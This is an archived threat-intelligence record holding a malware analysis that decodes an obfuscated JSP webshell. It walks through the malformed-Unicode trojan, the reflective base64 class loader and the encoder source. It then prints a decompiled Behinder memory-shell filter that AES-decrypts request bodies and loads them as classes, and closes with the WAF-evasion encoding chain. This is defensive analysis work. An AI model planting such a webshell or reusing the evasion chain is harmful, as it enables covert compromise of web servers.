{
	"id": "c623c5ef-eeea-468d-b19f-5dcecaba99c4",
	"created_at": "2026-04-06T00:13:56.326166Z",
	"updated_at": "2026-04-10T03:21:40.931443Z",
	"deleted_at": null,
	"sha1_hash": "cb2daa20130b2f1b3df74dd945c60114d21a672a",
	"title": "MyDocs/BehinderShell.md at main · hktalent/MyDocs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 139478,
	"plain_text": "MyDocs/BehinderShell.md at main · hktalent/MyDocs\r\nBy hktalent\r\nArchived: 2026-04-05 21:44:32 UTC\r\nBehinder Mem Shell\r\nTrojan sample\r\n\u003c%\\u0074\\u0072\\uuu0079 {\\uuu000a\\uuu0020 \\uuu0020 C\\uu006cas\\uu0073\\uuu004co\\uu0061d\\uuu0065\\uuu0072 \\u0063\\\r\n \\uu0020\\uu0020\\uu0020\\uuu0062yt\\uuu0065[\\u005d\\u0020b\\u0079\\uuu0074\\uuu0065\\uuu0063\\u006f\\u0064\\u0065\\uuu0020=\\\r\n \\u0020\\u0020\\u007d \\uu0063a\\u0074\\uu0063h\\u0020(C\\u006c\\uuu0061ssNo\\uu0074\\u0046o\\uu0075nd\\u0045x\\u0063e\\uuu00\r\n\\u0020\\u0020\\uuu0020\\uu0020\\u0020\\uuu0020\\uu0020 \\uuu0062y\\u0074e\\uu0063\\u006f\\u0064\\u0065 = (\\uu0062\\uuu0079\\uu\r\n\\uu0020 \\uuu0020 }\\uu000a\\uuu0020\\u0020 \\u006a\\u0061v\\uu0061\\uu002elang.\\u0072\\u0065f\\uu006cect\\uuu002e\\uu004de\r\n \\uuu0020\\uu0020\\u0020\\u0063l\\uuu007a.\\u006ee\\uu0077In\\uu0073t\\uuu0061\\uuu006ece();\\uu000a} \\uu0063\\uuu0061\\uuu0\r\nDecoding method\r\nThe sample cannot be Unicode-decoded directly: the escapes in it appear as \\uuu, \\uu and \\u, i.e. malformed Unicode escapes (\\uuu0079 is y, \\uu006c is l, \\u0074 is t).\r\nSince \\uuu0079 = \\uu0079 = \\u0079 = y, replace both \\uuu and \\uu with \\u and then Unicode-decode, one segment at a time.\r\nThe roughly decoded code is as follows\r\n\u003c%try {\r\n ClassLoader clzLoader = Thread.currentThread().getContextClassLoader();\r\n String clzName = \"Scrobicular\";\r\n String clzBytecodeBase64Str = \"xxxxx\";\r\n byte[] bytecode = null;\r\n try {\r\n Class base64Clz = clzLoader.loadClass(\"java.util.Base64\");\r\n Class decoderClz = clzLoader.loadClass(\"java.util.Base64$Decoder\");\r\n Object decoder = base64Clz.getMethod(\"getDecoder\").invoke(base64Clz);\r\n bytecode = (byte[]) decoderClz.getMethod(\"decode\", String.class).invoke(decoder, clzBytecodeBase64St\r\n } catch (ClassNotFoundException e) {\r\n Class datatypeConverterClz = clzLoader.loadClass(\"javax.xml.bind.DatatypeConverter\");\r\n bytecode = (byte[]) datatypeConverterClz.getMethod(\"parseBase64Binary\", String.class).invoke(datat\r\n }\r\n java.lang.reflect.Method defineClzMethod = clzLoader.loadClass(\"java.lang.ClassLoader\").getDeclaredMeth\r\n defineClzMethod.setAccessible(true);\r\n Class clz = (Class) defineClzMethod.invoke(clzLoader, clzName, bytecode, 0, bytecode.length);\r\n clz.newInstance();\r\n} catch (Exception e) {}%\u003e\r\nSearching GitHub for \"base64Clz\" turns up this project: https://github.com/TimelineSec/ATTCK-Tools-library/tree/master/JspEncoder\r\nUsage\r\nUnicode-decode a JSP file: java -jar JspEncoder.jar UniDe srcFile desFile\r\nUnicode-encode a JSP file: java -jar JspEncoder.jar UniEn srcFile desFile\r\nHTML-decode a JSPX file: java -jar JspEncoder.jar HtmlDe srcFile desFile\r\nHTML-encode a JSPX file: java -jar JspEncoder.jar HtmlEn srcFile desFile\r\nCDATA-decode a JSPX file: java -jar JspEncoder.jar CdataDe srcFile desFile\r\nCDATA-encode a JSPX file: java -jar JspEncoder.jar CdataEn srcFile desFile\r\nWrite a Base64 file out as a class file: java -jar JspEncoder.jar ClassOut srcFile desFile\r\nWrite a class file out as a Base64 file: java -jar JspEncoder.jar ClassIn srcFile desFile\r\nThe encoder source is as follows; its output pattern matches the signature captured by TianYan (天眼), so this decoder was used to attempt the decoding\r\nimport java.io.*;\r\npublic class encoderJsp {\r\n public encoderJsp(String srcFile, String desFile) throws IOException {\r\n FileInputStream fis = new FileInputStream(srcFile); // file input stream\r\n InputStreamReader isr = new InputStreamReader(fis); // input stream reader\r\n BufferedReader br = new BufferedReader(isr); // buffered character reader\r\n String line = \"\";\r\n String text = \"\";\r\n while ((line = br.readLine())!= null){\r\n text += line;\r\n }\r\n String subString = text.substring(2,text.length()-2);\r\n char[] charArray = subString.toCharArray();\r\n String result = \"\u003c%\";\r\n for (int i=0;i\u003ccharArray.length;i++){\r\n if (i==0 || i%8 == 0){\r\n String firstHex = Integer.toHexString(charArray[i]);\r\n if (firstHex.length()==2){\r\n firstHex = \"00\" + firstHex;\r\n result = result + \"\\\\uu\" + firstHex;\r\n }\r\n }else if ((i%8 != 0) \u0026\u0026 (i%9 == 0)){\r\n String nineHex = Integer.toHexString(charArray[i]);\r\n if (nineHex.length() == 2) {\r\n nineHex = \"00\" + nineHex;\r\n result = result + \"\\\\uuu\" + nineHex;\r\n }\r\n }else if ((i != 0) \u0026\u0026 (i%8 != 0) \u0026\u0026 (i%9 != 0) \u0026\u0026 (i%55 == 0)){\r\n result = result + charArray[i];\r\n } else{\r\n String elseHex = Integer.toHexString(charArray[i]);\r\n if (elseHex.length() == 2) {\r\n elseHex = \"00\" + elseHex;\r\n result = result + \"\\\\u\" + elseHex;\r\n }\r\n }\r\n }\r\n result = result + \"%\u003e\";\r\n FileWriter writer = new FileWriter(desFile);\r\n writer.write(\"\");\r\n writer.write(result);\r\n writer.flush();\r\n writer.close();\r\n System.out.println(\"[!]文件编码完成，已输出至\" + desFile);\r\n }\r\n}\r\nFinal code after decoding with decoderJsp\r\n\u003c%try {\r\n ClassLoader clzLoader = Thread.currentThread().getContextClassLoader();\r\n String clzName = \"Scrobicular\";\r\n String clzBytecodeBase64Str = \"yv66vgAAADIBHwcAcAcAdAgAMAcAjwgAFwcAcggBDggAVgEACVpLTTE1LjAuMAEADW\r\n try {\r\n Class base64Clz = clzLoader.loadClass(\"java.util.Base64\");\r\n Class decoderClz = clzLoader.loadClass(\"java.util.Base64$Decoder\");\r\n Object decoder = base64Clz.getMethod(\"getDecoder\").invoke(base64Clz);\r\n bytecode = (byte[]) decoderClz.getMethod(\"decode\", String.class).invoke(decoder, clzBytecodeB\r\n Class datatypeConverterClz = clzLoader.loadClass(\"javax.xml.bind.DatatypeConverter\");\r\n java.lang.reflect.Method defineClzMethod = clzLoader.loadClass(\"java.lang.ClassLoader\").getDecla\r\n defineClzMethod.setAccessible(true);\r\n Class clz = (Class) defineClzMethod.invoke(clzLoader, clzName, bytecode, 0, bytecode.length);\r\n} catch (Exception e) {}%\u003e\r\n1. clzBytecodeBase64Str is executed via reflection, so we need to decode its contents: extract the clzBytecodeBase64Str value and pass it to the ClassOut function. A Python script can also do this (it must be run on Linux, otherwise the output gets truncated).\r\n2. Viewing the resulting class in a hex editor shows a ZKM15 field; searching for it at first turned up nothing (Mr. Jia pointed out that it is obfuscation). Searching Google again for \"java ZKM15\" found relevant articles.\r\n3. At this point we need a deobfuscation tool; after some trials, https://github.com/java-deobfuscator/deobfuscator works.\r\n4. Notes on using deobfuscator: (1) the class obtained must be packaged into a zip; (2) just select the ZKM15-related transformers.\r\n5. Decompile the class file with Luyten (https://github.com/deathmarine/Luyten). After deobfuscation the result looks little different from the non-deobfuscated one: clzBytecodeBase64Str has the same beginning but a different ending, so at a glance it seems deobfuscation failed, but it actually succeeded.\r\nThe class obtained after two rounds of deobfuscation is as follows\r\npackage org.apache.catalina.filters;\r\nimport java.lang.reflect.*;\r\nimport javax.servlet.http.*;\r\nimport javax.crypto.*;\r\nimport javax.crypto.spec.*;\r\nimport java.security.*;\r\nimport javax.servlet.*;\r\nimport java.io.*;\r\npublic class MelebioseFilter implements Filter\r\n{\r\n public static int a;\r\n public static int b;\r\n \r\n private Class b(final Object[] array) {\r\n final byte[] array2 = (byte[])array[0];\r\n try {\r\n final ClassLoader classLoader = this.getClass().getClassLoader();\r\n final Method declaredMethod = classLoader.loadClass(\"java.lang.ClassLoader\").getDeclaredM\r\n declaredMethod.setAccessible(true);\r\n return (Class)declaredMethod.invoke(classLoader, null, array2, 0, array2.length);\r\n }\r\n catch (Throwable t) {\r\n throw new RuntimeException(t);\r\n }\r\n }\r\n \r\n private byte[] a(final Object[] array) {\r\n final String s = (String)array[0];\r\n try {\r\n final ClassLoader classLoader = this.getClass().getClassLoader();\r\n byte[] array2;\r\n try {\r\n final Class\u003c?\u003e loadClass = classLoader.loadClass(\"java.util.Base64\");\r\n array2 = (byte[])classLoader.loadClass(\"java.util.Base64$Decoder\").getMethod(\"decode\r\n }\r\n catch (ClassNotFoundException ex) {\r\n final Class\u003c?\u003e loadClass2 = classLoader.loadClass(\"javax.xml.bind.DatatypeConverter\"\r\n array2 = (byte[])loadClass2.getMethod(\"parseBase64Binary\", String.class).invoke(loadC\r\n }\r\n return array2;\r\n }\r\n catch (Throwable t) {\r\n throw new RuntimeException(t);\r\n }\r\n }\r\n \r\n public void init(final FilterConfig filterConfig) throws ServletException {\r\n }\r\n \r\n public void doFilter(final ServletRequest servletRequest, final ServletResponse servletResponse,\r\n final int b = MelebioseFilter.b;\r\n final HttpServletRequest httpServletRequest = (HttpServletRequest)servletRequest;\r\n final int n = b;\r\n final HttpServletResponse httpServletResponse = (HttpServletResponse)servletResponse;\r\n if (httpServletRequest.getHeader(\"User-Agent\") != null \u0026\u0026 httpServletRequest.getHeader(\"User-\r\n final ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();\r\n Label_0312: {\r\n try {\r\n if (httpServletRequest.getSession().getAttribute(\"u\") == null) {\r\n httpServletRequest.getSession().setAttribute(\"u\", (Object)\"7b35dabef09e402b\"\r\n }\r\n final Cipher instance = Cipher.getInstance(\"AES\");\r\n instance.init(2, new SecretKeySpec(((String)httpServletRequest.getSession().getAt\r\n final ServletInputStream inputStream = httpServletRequest.getInputStream();\r\n final byte[] array = new byte[1024];\r\n int read;\r\n while ((read = inputStream.read(array)) != -1) {\r\n byteArrayOutputStream.write(array, 0, read);\r\n if (n != 0) {\r\n break Label_0312;\r\n }\r\n if (n != 0) {\r\n break;\r\n }\r\n }\r\n this.b(new Object[] { instance.doFinal(this.a(new Object[] { new String(byteArray\r\n }\r\n catch (Throwable t) {\r\n filterChain.doFilter(servletRequest, servletResponse);\r\n }\r\n finally {\r\n byteArrayOutputStream.close();\r\n }\r\n }\r\n if (n == 0) {\r\n return;\r\n }\r\n }\r\n filterChain.doFilter(servletRequest, servletResponse);\r\n }\r\n \r\n public void destroy() {\r\n }\r\n}\r\nThis turns out to be a Behinder (冰蝎) memory shell. The full WAF-evasion pipeline applied to the memory shell is as follows\r\nBehinder memory shell --\u003e ZKM15 obfuscation --\u003e class file written out as a Base64 file --\u003e ZKM15 obfuscation --\u003e class file written out as a Base64 file --\u003e special Unicode encoding\r\nWhen the obfuscator is unknown, use the approach described here: https://mp.weixin.qq.com/s/yvEHxhsedSwB12PTcQ5aRg\r\nSource: https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/hktalent/MyDocs/blob/main/BehinderShell.md"
	],
	"report_names": [
		"BehinderShell.md"
	],
	"threat_actors": [],
	"ts_created_at": 1775434436,
	"ts_updated_at": 1775791300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cb2daa20130b2f1b3df74dd945c60114d21a672a.pdf",
		"text": "https://archive.orkl.eu/cb2daa20130b2f1b3df74dd945c60114d21a672a.txt",
		"img": "https://archive.orkl.eu/cb2daa20130b2f1b3df74dd945c60114d21a672a.jpg"
	}
}